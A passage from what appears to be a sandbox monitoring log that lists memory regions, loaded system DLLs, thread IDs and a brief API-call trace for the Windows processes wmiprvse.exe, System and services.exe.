3172 start_va = 0x5d0000 end_va = 0x5d2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cimwin32.dll.mui" filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui") Region: id = 3173 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 3174 start_va = 0x630000 end_va = 0x966fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3175 start_va = 0x970000 end_va = 0xaf7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 3176 start_va = 0xb00000 end_va = 0xc80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b00000" filename = "" Region: id = 3177 start_va = 0xc90000 end_va = 0xd4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c90000" filename = "" Region: id = 3178 start_va = 0xdd0000 end_va = 0xecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 3179 start_va = 0xed0000 end_va = 0xf4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 3180 start_va = 0xf50000 end_va = 0xfcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 3181 start_va = 0xfd0000 end_va = 0x104ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 3182 start_va = 0x1050000 end_va = 0x10cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 3183 start_va = 0x10d0000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 3184 start_va = 0x1150000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 3185 start_va = 0x11d0000 end_va = 0x124ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 3186 start_va = 0x12d0000 end_va = 0x134ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 3187 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3188 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 3189 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 3190 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 3191 start_va = 0x7ff62ff80000 end_va = 0x7ff62fffffff monitored = 0 entry_point = 0x7ff62ff95f50 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 3192 start_va = 0x7ff844700000 end_va = 0x7ff84474dfff monitored = 0 entry_point = 0x7ff844711ce0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 3193 start_va = 0x7ff844750000 end_va = 0x7ff84491efff monitored = 1 entry_point = 0x7ff844777df0 region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 3194 start_va = 0x7ff84c320000 end_va = 0x7ff84c335fff monitored = 0 entry_point = 0x7ff84c3255e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 3195 start_va = 0x7ff84d7e0000 end_va = 0x7ff84d804fff monitored = 0 entry_point = 0x7ff84d7e9900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 3196 start_va = 0x7ff84d810000 end_va = 0x7ff84d823fff monitored = 0 entry_point = 0x7ff84d811800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 3197 start_va = 0x7ff84d830000 end_va = 0x7ff84d925fff monitored = 0 entry_point = 0x7ff84d869590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 3198 start_va = 0x7ff84daf0000 end_va = 0x7ff84db00fff monitored = 0 entry_point = 0x7ff84daf2fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 3199 start_va = 0x7ff850160000 end_va = 0x7ff8501defff monitored = 1 entry_point = 0x7ff850177110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 3200 start_va = 0x7ff8593d0000 end_va = 0x7ff8593fcfff monitored = 0 entry_point = 0x7ff8593e9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3201 start_va = 0x7ff859580000 end_va = 0x7ff8595a8fff monitored = 0 entry_point = 0x7ff859594530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3202 start_va = 0x7ff859720000 end_va = 0x7ff85972efff monitored = 0 entry_point = 0x7ff859723210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3203 start_va = 0x7ff859730000 end_va = 0x7ff85977afff monitored = 0 entry_point = 0x7ff8597335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3204 start_va = 0x7ff859a20000 end_va = 0x7ff859c07fff monitored = 0 entry_point = 0x7ff859a4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3205 start_va = 0x7ff85a2c0000 end_va = 0x7ff85a329fff monitored = 0 entry_point = 0x7ff85a2f6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3206 start_va = 0x7ff85bcb0000 end_va = 0x7ff85be05fff monitored = 0 entry_point = 0x7ff85bcba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3207 start_va = 0x7ff85bea0000 end_va = 0x7ff85bfbbfff monitored = 0 entry_point = 0x7ff85bee02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3208 start_va = 0x7ff85bfd0000 end_va = 0x7ff85c076fff monitored = 0 entry_point = 0x7ff85bfe58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3209 start_va = 0x7ff85c080000 end_va = 0x7ff85c126fff monitored = 0 entry_point = 0x7ff85c08b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3210 start_va = 0x7ff85c130000 end_va = 0x7ff85c1f0fff monitored = 0 entry_point = 0x7ff85c150da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3211 start_va = 0x7ff85c360000 end_va = 0x7ff85c3fcfff monitored = 0 entry_point = 0x7ff85c3678a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3212 start_va = 0x7ff85c560000 end_va = 0x7ff85c6e5fff monitored = 0 entry_point = 0x7ff85c5affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3213 start_va = 0x7ff85cb80000 end_va = 0x7ff85cc2cfff monitored = 0 entry_point = 0x7ff85cb981a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3214 start_va = 0x7ff85cc30000 end_va = 0x7ff85cc8afff monitored = 0 entry_point = 0x7ff85cc438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3215 start_va = 0x7ff85cc90000 end_va = 0x7ff85cf0cfff monitored = 0 entry_point = 0x7ff85cd64970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3216 start_va = 0x7ff85cf10000 end_va = 0x7ff85cf7afff monitored = 0 entry_point = 0x7ff85cf290c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3217 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 174 os_tid = 0xc88 Thread: id = 175 os_tid = 0xbb0 [0309.034] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0309.035] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0309.127] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x8) returned 0x468420 [0309.127] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x14) returned 0x486b40 [0309.127] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x468420) returned 1 [0309.127] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x2c) returned 0x47c4b0 [0309.127] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x486b40) returned 1 [0309.128] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc8) returned 0x45fb50 [0309.128] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x45fb50) returned 1 [0309.128] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x34) returned 0x47c530 [0309.129] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x47c530) returned 1 [0309.129] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x80) returned 0x47d130 [0309.129] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x47c4b0) returned 1 [0309.140] memcpy (in: _Dst=0x124da00, _Src=0x494ab8, _Size=0x4 | out: _Dst=0x124da00) returned 0x124da00 [0309.141] memcpy (in: _Dst=0x124da00, _Src=0x4943c5, _Size=0x4 | out: _Dst=0x124da00) returned 0x124da00 [0309.141] memcpy (in: _Dst=0x124da00, _Src=0x494ac0, _Size=0x2 | out: _Dst=0x124da00) returned 0x124da00 [0309.142] memcpy (in: _Dst=0x124da00, _Src=0x4943cb, _Size=0x2 | out: _Dst=0x124da00) returned 0x124da00 [0309.142] memcpy (in: _Dst=0x124da00, _Src=0x4943cd, _Size=0x2 | out: _Dst=0x124da00) returned 0x124da00 [0309.524] memcpy (in: _Dst=0x124deb0, _Src=0x499305, _Size=0x2 | out: _Dst=0x124deb0) returned 0x124deb0 [0309.524] memcpy (in: _Dst=0x124deb0, _Src=0x499307, _Size=0x2 | out: _Dst=0x124deb0) returned 0x124deb0 [0309.524] memcpy (in: _Dst=0x124deb0, _Src=0x499309, _Size=0x2 | out: _Dst=0x124deb0) returned 0x124deb0 [0309.524] memcpy (in: _Dst=0x124deb0, _Src=0x49930b, _Size=0x2 | out: _Dst=0x124deb0) returned 0x124deb0 [0309.525] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x28) returned 0x465820 [0309.525] SafeArrayGetElemsize (psa=0x47c680) returned 0x8 [0309.525] memcpy (in: _Dst=0x124dc60, _Src=0x124db98, _Size=0x8 | out: _Dst=0x124dc60) returned 0x124dc60 [0309.526] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x465820) returned 1 [0309.526] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x473500) returned 1 [0309.526] memcpy (in: _Dst=0x124deb0, _Src=0x49753a, _Size=0x4 | out: _Dst=0x124deb0) returned 0x124deb0 [0309.591] DllGetClassObject (in: rclsid=0x46cc00*(Data1=0xd63a5850, Data2=0x8f16, Data3=0x11cf, Data4=([0]=0x9f, [1]=0x47, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbf, [6]=0x34, [7]=0x5c)), riid=0x7ff62ffce0e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x124dc48 | out: ppv=0x124dc48*=0xdef740) returned 0x0 [0309.715] EtwEventWrite () returned 0x0 [0309.724] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () [0310.134] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 Thread: id = 176 os_tid = 0xba8 Thread: id = 177 os_tid = 0xba4 Thread: id = 178 os_tid = 0xba0 Thread: id = 179 os_tid = 0xb98 Thread: id = 180 os_tid = 0xb94 Thread: id = 181 os_tid = 0xb90 Thread: id = 182 os_tid = 0xb8c Thread: id = 183 os_tid = 0xb5c Process: id = "24" image_name = "System" filename = "" page_root = "0x1aa000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "16" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 4962 start_va = 0x77760000 end_va = 0x778dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4963 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4964 start_va = 0x1fb80000000 end_va = 0x1fb8002ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fb80000000" filename = "" Region: id = 4965 start_va = 0x1fb80030000 end_va = 0x1fb8005ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fb80030000" filename = "" Region: id = 4966 start_va = 0x1fb80060000 end_va = 0x1fb8007ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fb80060000" filename = "" Region: id = 4967 start_va = 0x1fb80080000 end_va = 0x1fb8009ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fb80080000" filename = "" Region: id = 4968 start_va = 0x1fb800a0000 end_va = 0x1fb800cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fb800a0000" filename = "" Region: id = 4969 start_va = 0x1fb800d0000 end_va = 0x1fb800fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fb800d0000" filename = "" Region: id = 4970 start_va = 0x1fb80100000 end_va = 0x1fb8012ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fb80100000" filename = "" Region: id = 4971 start_va = 0x1fb80130000 end_va = 0x1fb8015ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fb80130000" filename = "" Region: id = 4972 start_va = 0x1fb80160000 end_va = 0x1fb80160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fb80160000" filename = "" Region: id = 4973 start_va = 0x1fb80170000 end_va = 0x1fb80170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fb80170000" filename = "" Region: id = 4974 start_va = 0x1fb80180000 end_va = 0x1fb80180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fb80180000" filename = "" Region: id = 4975 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 196 os_tid = 0xd68 Thread: id = 197 os_tid = 0xcf8 Thread: id = 198 os_tid = 0xce8 Thread: id = 199 os_tid = 0x954 Thread: id = 200 os_tid = 0xc78 Thread: id = 201 os_tid = 0x30c Thread: id = 202 os_tid = 0xa00 Thread: id = 203 os_tid = 0xe4 Thread: id = 204 os_tid = 0xaf0 Thread: id = 205 os_tid = 0xae4 Thread: id = 206 os_tid = 0xa60 Thread: id = 207 os_tid = 0xa54 Thread: id = 208 os_tid = 0x9e4 Thread: id = 209 os_tid = 0x9d8 Thread: id = 210 os_tid = 0x34 Thread: id = 211 os_tid = 0x8b8 Thread: id = 212 os_tid = 0x8a4 Thread: id = 213 os_tid = 0xf8 Thread: id = 214 os_tid = 0xfc Thread: id = 215 os_tid = 0x758 Thread: id = 216 os_tid = 0x574 Thread: id = 217 os_tid = 0xc4 Thread: id = 218 os_tid = 0x4b4 Thread: id = 219 os_tid = 0x28 Thread: id = 220 os_tid = 0xb0 Thread: id = 221 os_tid = 0x6ac Thread: id = 222 os_tid = 0x68c Thread: id = 223 os_tid = 0x664 Thread: id = 224 os_tid = 0x660 Thread: id = 225 os_tid = 0x65c Thread: id = 226 os_tid = 0x640 Thread: id = 227 os_tid = 0x610 Thread: id = 228 os_tid = 0x60c Thread: id = 229 os_tid = 0x40 Thread: id = 230 os_tid = 0x5fc Thread: id = 231 os_tid = 0x5b8 Thread: id = 232 os_tid = 0x57c Thread: id = 233 os_tid = 0x4c0 Thread: id = 234 os_tid = 0x10 Thread: id = 235 os_tid = 0x68 Thread: id = 236 os_tid = 0x74 Thread: id = 237 os_tid = 0x168 Thread: id = 238 os_tid = 0x174 Thread: id = 239 os_tid = 0x7c Thread: id = 240 os_tid = 0x19c Thread: id = 241 os_tid = 0x1a0 Thread: id = 242 os_tid = 0x1dc Thread: id = 243 os_tid = 0x2f4 Thread: id = 244 os_tid = 0xa4 Thread: id = 245 os_tid = 0x8c Thread: id = 246 os_tid = 0x198 Thread: id = 247 os_tid = 0x6c Thread: id = 248 os_tid = 0x84 Thread: id = 249 os_tid = 0x3c Thread: id = 250 os_tid = 0x128 Thread: id = 251 os_tid = 0x164 Thread: id = 252 os_tid = 0x78 Thread: id = 253 os_tid = 0x30 Thread: id = 254 os_tid = 0x20 Thread: id = 255 os_tid = 0x14 Thread: id = 256 os_tid = 0x1a4 Thread: id = 257 os_tid = 0x194 Thread: id = 258 os_tid = 0x190 Thread: id = 259 os_tid = 0x18c Thread: id = 260 os_tid = 0x188 Thread: id = 261 os_tid = 0x180 Thread: id = 262 os_tid = 0x38 Thread: id = 263 os_tid = 0xe0 Thread: id = 264 os_tid = 0xa8 Thread: id = 265 os_tid = 0x14c Thread: id = 266 os_tid = 0xc0 Thread: id = 267 os_tid = 0x154 Thread: id = 268 os_tid = 0x150 Thread: id = 269 os_tid = 0x148 Thread: id = 270 os_tid = 0x144 Thread: id = 271 os_tid = 0x58 Thread: id = 272 os_tid = 0xb4 Thread: id = 273 os_tid = 0x5c Thread: id = 274 os_tid = 0x134 Thread: id = 275 os_tid = 0xb8 Thread: id = 276 os_tid = 0xbc Thread: id = 277 os_tid = 0x88 Thread: id = 278 os_tid = 0xe8 Thread: id = 279 os_tid = 0x8 Thread: id = 280 os_tid = 0xec Thread: id = 522 os_tid = 0x18 Process: id = "25" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x5ae75000" os_pid = "0x214" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "16" os_parent_pid = "0x1bc" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 3459 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3460 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3461 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3462 start_va = 0x70000 end_va = 0xbefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 3463 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 3464 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 3465 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 3466 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 3467 start_va = 0x110000 end_va = 0x116fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 3468 start_va = 0x120000 end_va = 0x1ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3469 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3470 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3471 start_va = 0x580000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3472 start_va = 0x600000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 3473 start_va = 0x680000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 3474 start_va = 0x770000 end_va = 0x776fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 3475 start_va = 0x780000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 3476 start_va = 0x800000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3477 start_va = 0x900000 end_va = 0xcfafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 3478 start_va = 0xd00000 end_va = 0xd7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 3479 start_va = 0xd80000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 3480 start_va = 0xe00000 end_va = 0xe7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 3481 start_va = 0xe80000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 3482 start_va = 0xf00000 end_va = 0xf7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 3483 start_va = 0xf80000 end_va = 0xffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 3484 start_va = 0x1000000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 3485 start_va = 0x1100000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 3486 start_va = 0x1180000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 3487 start_va = 0x1200000 end_va = 0x127ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 3488 start_va = 0x1280000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 3489 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3490 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 3491 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 3492 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 3493 start_va = 0x7ff6ae4c0000 end_va = 0x7ff6ae52efff monitored = 0 entry_point = 0x7ff6ae4e07c0 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 3494 start_va = 0x7ff84d250000 end_va = 0x7ff84d26cfff monitored = 0 entry_point = 0x7ff84d25a9c0 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 3495 start_va = 0x7ff84d2f0000 end_va = 0x7ff84d315fff monitored = 0 entry_point = 0x7ff84d2f1cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3496 start_va = 0x7ff855d50000 end_va = 0x7ff855d5ffff monitored = 0 entry_point = 0x7ff855d52c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 3497 start_va = 0x7ff857b80000 end_va = 0x7ff857b87fff monitored = 0 entry_point = 0x7ff857b813e0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 3498 start_va = 0x7ff858990000 end_va = 0x7ff8589d8fff monitored = 0 entry_point = 0x7ff85899a090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 3499 start_va = 0x7ff8589e0000 end_va = 0x7ff858a5bfff monitored = 0 entry_point = 0x7ff8589e2030 region_type = mapped_file name = "scesrv.dll" filename = "\\Windows\\System32\\scesrv.dll" (normalized: "c:\\windows\\system32\\scesrv.dll") Region: id = 3500 start_va = 0x7ff858fc0000 end_va = 0x7ff85901bfff monitored = 0 entry_point = 0x7ff858fd6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3501 start_va = 0x7ff8593d0000 end_va = 0x7ff8593fcfff monitored = 0 entry_point = 0x7ff8593e9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3502 start_va = 0x7ff859560000 end_va = 0x7ff859578fff monitored = 0 entry_point = 0x7ff859565e10 region_type = mapped_file name = 